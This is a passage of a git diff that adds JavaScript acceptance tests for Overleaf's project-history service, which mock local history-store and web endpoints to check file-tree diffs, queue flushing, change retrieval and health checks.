+ startVersion: 3, + }, + authors: [31], + }) + + request.get( + { + url: `http://127.0.0.1:3054/project/${this.projectId}/diff`, + qs: { + pathname: 'not_here.tex', + from: 3, + to: 6, + }, + json: true, + }, + (error, res, body) => { + if (error) { + throw error + } + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + + it('should return a binary flag with a diff of a binary file', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + this.binaryBlob = Buffer.from([1, 2, 3, 4]) + this.binarySha = createMockBlob(this.historyId, this.binaryBlob) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'binary.tex': { + hash: this.binarySha, + byteLength: this.binaryBlob.length, // Indicates binary + }, + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, // Indicates binary + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'binary.tex', + 3, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: { + binary: true, + }, + }) + done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js b/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js new file mode 100644 index 0000000..c5436af --- /dev/null +++ b/services/project-history/test/acceptance/js/DiscardingUpdatesTests.js @@ -0,0 +1,73 @@ +/* 
eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('DiscardingUpdates', function () { + beforeEach(function (done) { + this.timestamp = new Date() + + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + this.user_id = new ObjectId().toString() + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: 0, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { name: 'Test Project' }) + return ProjectHistoryClient.initializeProject(this.project_id, done) + }) + }) + + return it('should discard updates', function (done) { + return async.series( + [ + cb => { + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.doc_id, + meta: { user_id: this.user_id, ts: new Date() }, + } + return ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + return ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/FileTreeDiffTests.js b/services/project-history/test/acceptance/js/FileTreeDiffTests.js new file mode 100644 index 0000000..1b43dc1 --- /dev/null +++ b/services/project-history/test/acceptance/js/FileTreeDiffTests.js @@ -0,0 +1,880 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import sinon from 'sinon' +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import request from 'request' +import assert from 'node:assert' +import Path from 'node:path' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import * as HistoryId from './helpers/HistoryId.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const sha = data => crypto.createHash('sha1').update(data).digest('hex') + +describe('FileTree Diffs', function () { + beforeEach(function (done) { + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + this.historyId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + + return ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + afterEach(function () { + return nock.cleanAll() + }) + + it('should return a diff of the updates to a doc from a single chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'renamed.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + 'deleted.tex': { + hash: sha('mock-sha-deleted'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'renamed.tex', + newPathname: 'newName.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'deleted.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + file: { + hash: sha('new-sha'), + stringLength: 42, + }, + pathname: 'added.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 7, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'edited', + }, + { + pathname: 'deleted.tex', + operation: 'removed', + deletedAtV: 5, + editable: true, + }, + { + newPathname: 'newName.tex', + pathname: 'renamed.tex', + operation: 'renamed', + editable: true, + }, + { + pathname: 'added.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + 
it('should return a diff of the updates to a doc across multiple chunks', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + // Updated in this chunk + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'bar.tex': { + // Updated in the next chunk + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'baz.tex': { + // Not updated + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'renamed.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + 'deleted.tex': { + hash: sha('mock-sha-deleted'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'renamed.tex', + newPathname: 'newName.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:19.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'deleted.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 2, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'baz.tex': { + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + 'newName.tex': { + hash: sha('mock-sha-renamed'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + file: { + hash: sha('new-sha'), + stringLength: 42, + }, + pathname: 'added.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'bar.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:23.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 2, + 7, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'edited', + }, + { + pathname: 'bar.tex', + operation: 'edited', + }, + { + pathname: 'baz.tex', + editable: true, + }, + { + pathname: 'deleted.tex', + operation: 'removed', + deletedAtV: 4, + editable: true, + }, + { + newPathname: 'newName.tex', + pathname: 'renamed.tex', + operation: 'renamed', + editable: true, + }, + { + pathname: 'added.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should return a diff that includes multiple renames', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: 'two.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'two.tex', + newPathname: 'three.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + 
(error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + newPathname: 'three.tex', + pathname: 'one.tex', + operation: 'renamed', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should handle deleting then re-adding a file', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'one.tex', + file: { + hash: sha('mock-sha'), + }, + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'one.tex', + operation: 'added', + editable: null, + }, + ], + }) + return done() + } + ) + }) + + it('should handle deleting the renaming a file to the same place', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'one.tex': { + hash: sha('mock-sha-one'), + stringLength: 42, + }, + 'two.tex': { + hash: sha('mock-sha-two'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'two.tex', + newPathname: 'one.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'two.tex', + newPathname: 'one.tex', + operation: 'renamed', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should handle adding then renaming a file', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'one.tex', + file: { + hash: sha('mock-sha'), + stringLength: 42, + }, + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'one.tex', + newPathname: 'two.tex', + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'two.tex', + operation: 'added', + editable: true, + }, + ], + }) + return done() + } + ) + }) + + it('should return 422 with a chunk with an invalid rename', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { 
+ files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + 'bar.tex': { + hash: sha('mock-sha-bar'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + newPathname: 'bar.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 5, + 6, + (error, diff, statusCode) => { + if (error != null) { + throw error + } + expect(statusCode).to.equal(422) + return done() + } + ) + }) + + it('should return 200 with a chunk with an invalid add', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: sha('mock-sha-foo'), + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + file: { + hash: sha('new-sha'), + }, + pathname: 'foo.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 5, + 6, + (error, diff, statusCode) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + pathname: 'foo.tex', + operation: 'added', + editable: null, + }, + ], + }) + expect(statusCode).to.equal(200) + return done() + } + ) + }) + + it('should handle edits of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'new.tex', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:18.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + operation: 'edited', + pathname: 'new.tex', + }, + ], + }) + return done() + } + ) + }) + + it('should handle deletions of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'missing.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [], + }) + return done() + } + ) + }) + + return it('should handle renames of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + 
history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'missing.tex', + newPathname: 'missing-renamed.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + newPathname: 'missing-renamed-other.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [], + }) + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/FlushManagerTests.js b/services/project-history/test/acceptance/js/FlushManagerTests.js new file mode 100644 index 0000000..d11346d --- /dev/null +++ b/services/project-history/test/acceptance/js/FlushManagerTests.js @@ -0,0 +1,242 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('Flushing old queues', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + this.fileId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + changes: [], + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('retrying an unflushed project', function () { + describe('when the update is older than the cutoff', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now() - 24 * 3600 * 1000, + cb + ), + ], + done + ) + }) + + it('flushes the project history queue', function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/flush/old?maxAge=10800', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + done() + } + ) + }) + + it('flushes the project history queue in the background when requested', 
function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/flush/old?maxAge=10800&background=1', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + expect(body).to.equal('{"message":"running flush in background"}') + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates in the foreground' + ) + setTimeout(() => { + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates in the background' + ) + done() + }, 100) + } + ) + }) + }) + + describe('when the update is newer than the cutoff', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now() - 60 * 1000, + cb + ), + ], + done + ) + }) + + it('does not flush the project history queue', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/flush/old?maxAge=${3 * 3600}`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates' + ) + done() + } + ) + }) + }) + + describe('when the update does not have a timestamp', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + this.startDate = Date.now() + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.clearFirstOpTimestamp(this.projectId, cb), + ], + done + ) + }) + + it('flushes the project history queue anyway', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/flush/old?maxAge=${3 * 3600}`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + ProjectHistoryClient.getFirstOpTimestamp( + this.projectId, + (err, result) => { + if (err) { + return done(err) + } + expect(result).to.be.null + done() + } + ) + } + ) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/GetChangesInChunkSince.js b/services/project-history/test/acceptance/js/GetChangesInChunkSince.js new file mode 100644 index 0000000..2c8c44b --- /dev/null +++ b/services/project-history/test/acceptance/js/GetChangesInChunkSince.js @@ -0,0 +1,158 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import Core from 'overleaf-editor-core' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import latestChunk from '../fixtures/chunks/7-8.json' with { type: 'json' } +import previousChunk 
from '../fixtures/chunks/4-6.json' with { type: 'json' } +import firstChunk from '../fixtures/chunks/0-3.json' with { type: 'json' } +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('GetChangesInChunkSince', function () { + let projectId, historyId + beforeEach(function (done) { + projectId = new ObjectId().toString() + historyId = new ObjectId().toString() + ProjectHistoryApp.ensureRunning(error => { + if (error) throw error + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + + ProjectHistoryClient.initializeProject(historyId, (error, olProject) => { + if (error) throw error + MockWeb() + .get(`/project/${projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/7/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/3/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/2/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/1/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/0/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + done() + }) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + function expectChangesSince(version, n, changes, done) { + ProjectHistoryClient.getChangesInChunkSince( + projectId, + version, + {}, + (error, got) => { + if (error) throw error + expect(got.latestStartVersion).to.equal(6) + expect(got.changes).to.have.length(n) + expect(got.changes.map(c => Core.Change.fromRaw(c))).to.deep.equal( + changes.map(c => Core.Change.fromRaw(c)) + ) + done() + } + ) + } + + const cases = { + 8: { + name: 'when up-to-date, return zero changes', + n: 0, + changes: [], + }, + 7: { + name: 'when one version behind, return one change', + n: 1, + changes: latestChunk.chunk.history.changes.slice(1), + }, + 6: { + name: 'when at current chunk boundary, return latest chunk in full', + n: 2, + changes: latestChunk.chunk.history.changes, + }, + 5: { + name: 'when one version behind last chunk, return one change', + n: 1, + changes: previousChunk.chunk.history.changes.slice(2), + }, + 4: { + name: 'when in last chunk, return two changes', + n: 2, + changes: previousChunk.chunk.history.changes.slice(1), + }, + 3: { + name: 'when at previous chunk boundary, return just the previous chunk', + n: 3, + changes: previousChunk.chunk.history.changes, + }, + 2: { + name: 'when at end of first chunk, return one change', + n: 1, + changes: firstChunk.chunk.history.changes.slice(2), + }, + 1: { + name: 'when in first chunk, return two changes', + n: 2, + 
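+      // since=1 lands inside the first chunk (versions 0-3), so the first
+      // of its three changes is skipped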
changes: firstChunk.chunk.history.changes.slice(1),
+    },
+    0: {
+      name: 'when from zero, return just the first chunk',
+      n: 3,
+      changes: firstChunk.chunk.history.changes,
+    },
+  }
+
+  for (const [since, { name, n, changes }] of Object.entries(cases)) {
+    it(name, function (done) {
+      expectChangesSince(since, n, changes, done)
+    })
+  }
+
+  it('should return an error when past the end version', function (done) {
+    ProjectHistoryClient.getChangesInChunkSince(
+      projectId,
+      9,
+      { allowErrors: true },
+      (error, _body, statusCode) => {
+        if (error) throw error
+        expect(statusCode).to.equal(400)
+        done()
+      }
+    )
+  })
+})
diff --git a/services/project-history/test/acceptance/js/HealthCheckTests.js b/services/project-history/test/acceptance/js/HealthCheckTests.js
new file mode 100644
index 0000000..1fc9efa
--- /dev/null
+++ b/services/project-history/test/acceptance/js/HealthCheckTests.js
@@ -0,0 +1,76 @@
+/* eslint-disable
+    no-undef,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import { expect } from 'chai'
+import settings from '@overleaf/settings'
+import request from 'request'
+import mongodb from 'mongodb-legacy'
+import nock from 'nock'
+import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js'
+import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js'
+const { ObjectId } = mongodb
+
+const MockHistoryStore = () => nock('http://127.0.0.1:3100')
+const MockWeb = () => nock('http://127.0.0.1:3000')
+
+describe('Health Check', function () {
+  beforeEach(function (done) {
+    const projectId = new ObjectId()
+    const historyId = new ObjectId().toString()
+    settings.history.healthCheck = { project_id: projectId }
+    return ProjectHistoryApp.ensureRunning(error => {
+      if (error != null) {
+        throw error
+      }
+      MockHistoryStore().post('/api/projects').reply(200, {
+        projectId: historyId,
+      })
+      MockHistoryStore()
+        .get(`/api/projects/${historyId}/latest/history`)
+        .reply(200, {
+          chunk: {
+            startVersion: 0,
+            history: {
+              snapshot: {},
+              changes: [],
+            },
+          },
+        })
+      MockWeb()
+        .get(`/project/${projectId}/details`)
+        .reply(200, {
+          name: 'Test Project',
+          overleaf: {
+            history: {
+              id: historyId,
+            },
+          },
+        })
+
+      return ProjectHistoryClient.initializeProject(historyId, done)
+    })
+  })
+
+  return it('should respond to the health check', function (done) {
+    return request.get(
+      {
+        url: 'http://127.0.0.1:3054/health_check',
+      },
+      (error, res, body) => {
+        if (error != null) {
+          return done(error)
+        }
+        expect(res.statusCode).to.equal(200)
+        return done()
+      }
+    )
+  })
+})
diff --git a/services/project-history/test/acceptance/js/LabelsTests.js b/services/project-history/test/acceptance/js/LabelsTests.js
new file mode 100644
index 0000000..2812add
--- /dev/null
+++ b/services/project-history/test/acceptance/js/LabelsTests.js
@@ -0,0 +1,282 @@
+import { expect } from 'chai'
+import mongodb from 'mongodb-legacy'
+import nock from 'nock'
